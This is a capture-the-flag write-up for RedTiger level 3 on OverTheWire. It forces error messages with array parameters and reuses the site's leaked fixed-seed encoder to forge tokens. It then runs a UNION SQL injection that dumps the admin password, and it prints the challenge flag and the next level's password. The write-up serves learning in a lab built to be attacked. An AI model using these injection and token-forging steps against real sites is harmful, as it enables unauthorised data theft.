Level 3

Writeup

  • https://redtiger.labs.overthewire.org/level3.php
  • To provoke an error message, append [] to the parameters: user[]=%60&password[]=%60&login=Login
    • Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /var/www/html/hackit/level3.php on line 97
    • But this is of no use.
  • From the hints given, TheCow and Admin, there is another parameter, usr; append [] to it in the same way: https://redtiger.labs.overthewire.org/level3.php?usr[]=MDQyMjExMDE0MTgyMTQw
  • Result: Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25
  • Download: https://redtiger.labs.overthewire.org/urlcrypt.inc

    <?php
        // warning! ugly code ahead :)
        // encrypt(): XOR every byte with a PRNG stream seeded by a constant,
        // write each result as three zero-padded decimal digits, then base64.
        function encrypt($str)
        {
            $cryptedstr = "";
            srand(3284724);                   // fixed seed: the keystream is always the same
            for ($i =0; $i < strlen($str); $i++)
            {
                $temp = ord(substr($str,$i,1)) ^ rand(0, 255);
    
                while(strlen($temp)<3)        // zero-pad to exactly three digits
                {
                    $temp = "0".$temp;
                }
                $cryptedstr .= $temp. "";
            }
            return base64_encode($cryptedstr);
        }
        // decrypt(): reseed with the same constant and undo the steps above.
        function decrypt ($str)
        {
            srand(3284724);
            if(preg_match('%^[a-zA-Z0-9/+]*={0,2}$%',$str))   // accept only base64 characters
            {
                $str = base64_decode($str);
                if ($str != "" && $str != null && $str != false)
                {
                    $decStr = "";
                    for ($i=0; $i < strlen($str); $i+=3)      // one three-digit group per byte
                    {
                        $array[$i/3] = substr($str,$i,3);
                    }
                    foreach($array as $s)
                    {
                        $a = $s ^ rand(0, 255);               // same rand() sequence as encrypt()
                        $decStr .= chr($a);
                    }
                    return $decStr;
                }
                return false;
            }
            return false;
        }
    ?>
    
  • The source shows that this encrypts and decrypts the usr parameter; we only need the encrypt part, with an output line added:

    #!/usr/bin/php
    <?php
        // warning! ugly code ahead :)
        function encrypt($str)
        {
            $cryptedstr = "";
            srand(3284724);
            for ($i =0; $i < strlen($str); $i++)
            {
                $temp = ord(substr($str,$i,1)) ^ rand(0, 255);
    
                while(strlen($temp)<3)
                {
                    $temp = "0".$temp;
                }
                $cryptedstr .= $temp. "";
            }
            return base64_encode($cryptedstr);
        }
        echo encrypt($argv[1])."\n";              // <--- output
    ?>
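    As an added illustration (not code from the challenge or from this writeup), the Python below re-creates the structure of urlcrypt.inc: a fixed-seed PRNG XORed into the plaintext byte by byte, each result written as three decimal digits, then base64. PHP's srand()/rand() sequence cannot be reproduced from Python, so the keystream here is a stand-in (Python's own PRNG seeded with the same constant) and the tokens it produces will not match the site's; the format handling is identical, which is enough to show two properties: the scheme is deterministic (same input, same token), and a token leaks the plaintext length exactly, since the sample usr token above decodes to five triples, i.e. a five-character value.

```python
import base64
import random

# Constructed example: same structure as urlcrypt.inc, stand-in keystream.
SEED = 3284724  # the constant seed from urlcrypt.inc


def keystream(n, seed=SEED):
    """Stand-in for PHP's srand(SEED); rand(0, 255) stream (NOT bit-identical)."""
    rng = random.Random(seed)
    return [rng.randint(0, 255) for _ in range(n)]


def encode_triples(xored):
    """Format step of encrypt(): each XORed byte as 3 zero-padded digits, then base64."""
    digits = "".join(f"{b:03d}" for b in xored)
    return base64.b64encode(digits.encode("ascii")).decode("ascii")


def decode_triples(token):
    """Inverse of the format step: base64 -> digit string -> list of byte values.

    Unlike the PHP decrypt(), malformed input is rejected instead of silently
    producing garbage.
    """
    digits = base64.b64decode(token, validate=True).decode("ascii")
    if len(digits) % 3 != 0 or not digits.isdigit():
        raise ValueError("not a urlcrypt-style token")
    vals = [int(digits[i:i + 3]) for i in range(0, len(digits), 3)]
    if any(v > 255 for v in vals):
        raise ValueError("triple out of byte range")
    return vals


def encrypt(plaintext, seed=SEED):
    """XOR with the fixed keystream, then apply the triple/base64 format."""
    data = plaintext.encode("latin-1")
    ks = keystream(len(data), seed)
    return encode_triples([b ^ k for b, k in zip(data, ks)])


def decrypt(token, seed=SEED):
    """Undo the format, then XOR with the same fixed keystream."""
    xored = decode_triples(token)
    ks = keystream(len(xored), seed)
    return bytes(b ^ k for b, k in zip(xored, ks)).decode("latin-1")


def plaintext_length(token):
    """The format leaks the plaintext length: exactly one triple per byte."""
    return len(decode_triples(token))


if __name__ == "__main__":
    # The usr token seen in the challenge URL carries five bytes.
    print(decode_triples("MDQyMjExMDE0MTgyMTQw"))   # [42, 211, 14, 182, 140]
    print(plaintext_length("MDQyMjExMDE0MTgyMTQw"))  # 5
    tok = encrypt("Admin")
    print(tok, decrypt(tok))                         # round-trips
    print(encrypt("Admin") == tok)                   # deterministic: True
```

    Because the seed is a constant embedded in the source, anyone holding urlcrypt.inc can produce a valid token for any string; the transformation provides neither secrecy nor integrity, and on the server side the only effective protection for the query that consumes usr is a parameterised statement, not the encoding of the parameter.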
    
  • Next, perform an ordinary SQLi on the usr parameter; the [] is no longer needed, and the input must be the encrypted value.
  • When the injection reaches 7 columns, the table appears: ' union select 1,2,3,4,5,6,7#
  • Final payload: ' union select 1,username,3,4,5,password,7 from level3_users where username='Admin'#
  • Encrypted: MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDIwMjM4MDE1MTI3MTMzMTkwMTU0MDAxMjQ2MTU3MjA4MTc3MDk2MTI4MjIwMTE2MTIxMTYzMTQ5MjEzMTYwMTA4MDMyMjUyMjAzMDk3MTU2MTkwMTc1MDEzMTM5MDc4MTU1MDk2MDg1MTM0MTk3MTE5MDU5MTYzMTc4MDU2MDM3MDAzMTM2MDQ3MDY2MTA2MTE0MDQ2MjA2MTQ4MDcyMTQxMjE0MDc1MDQ0MjE1MjAzMDM3MDgyMTk4MDcyMTIzMjE1MTE0MjIz
  • Final result:
    Show userdetails:
    Username:   Admin
    First name: thisisaverysecurepasswordEEE5rt
    Name:       7
    ICQ:        5
    Email:      4
    
  • After logging in:

    Login correct. You are admin :);
    
    You can raise your wechall.net score with this flag: a707b245a60d570d25a0449c2a516eca
    
    The password for the next level is: there_is_no_bug
    
